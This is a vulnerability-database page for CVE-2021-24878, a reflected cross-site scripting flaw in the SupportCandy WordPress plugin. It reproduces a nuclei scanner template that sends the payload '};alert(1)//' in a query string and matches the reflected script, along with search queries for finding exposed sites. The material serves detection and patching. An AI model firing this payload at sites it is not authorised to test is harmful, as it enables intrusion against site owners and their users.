Lucene search
K

SupportCandy < 2.2.7 - Reflected Cross-Site Scripting

šŸ—“ļøĀ 06 Jul 2026Ā 03:02:03Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 19Ā Views

SupportCandy before 2.2.7 has reflected XSS via unsanitized query in wpsc_create_ticket.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24878
7 Feb 202218:35
–circl
CNNVD
Wordpress Plugin SupportCandy č·Øē«™č„šęœ¬ę¼ę“ž
7 Feb 202200:00
–cnnvd
CVE
CVE-2021-24878
7 Feb 202215:47
–cve
Cvelist
CVE-2021-24878 SupportCandy < 2.2.7 - Reflected Cross-Site Scripting
7 Feb 202215:47
–cvelist
EUVD
EUVD-2021-11790
7 Oct 202500:30
–euvd
NVD
CVE-2021-24878
7 Feb 202216:15
–nvd
OSV
CVE-2021-24878
7 Feb 202216:15
–osv
Patchstack
WordPress SupportCandy plugin <= 2.2.6 - Reflected Cross-Site Scripting (XSS) vulnerability
5 Jan 202200:00
–patchstack
Prion
Cross site scripting
7 Feb 202216:15
–prion
Positive Technologies
PT-2022-9489
7 Feb 202200:00
–ptsecurity
Rows per page
id: CVE-2021-24878

info:
  name: SupportCandy < 2.2.7 - Reflected Cross-Site Scripting
  author: popcorn94
  severity: medium
  description: |
    The SupportCandy WordPress plugin before 2.2.7 does not sanitise and escape the query string before outputting it back in pages with the [wpsc_create_ticket] shortcode embed, leading to a Reflected Cross-Site Scripting issue
  impact: |
    Attackers can inject malicious JavaScript via reflected XSS in pages with wpsc_create_ticket shortcode, potentially stealing user session cookies or manipulating support ticket data.
  remediation: Fixed in 2.2.7
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24878
    - https://github.com/andrewcy86/supportcandy(plugin)
    - https://wpscan.com/vulnerability/d2f1fd60-5e5e-4e38-9559-ba2d14ae37bf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24878
    cwe-id: CWE-79
    epss-score: 0.01165
    epss-percentile: 0.63477
    cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supportcandy
    product: supportcandy
    framework: wordpress
    fofa-query: body="/wp-content/plugins/supportcandy/"
    publicwww-query: "/wp-content/plugins/supportcandy/"
  tags: cve,cve2021,wordpress,wpscan,wp-plugin,supportcandy,xss,vkev,vuln

http:
  - raw:
      - |
        GET /?};alert(1)// HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "var attrs = {};alert(1)//:"
          - "wpsc_create_ticket_init"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022044689682f74c6d76545e3866eff9b41920082e287440fee1eb8cf74a78e4a887022050656c80f75a5670d1a863b4ddab547627f7dfcc5566830f7e95fab91e375945:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01165
19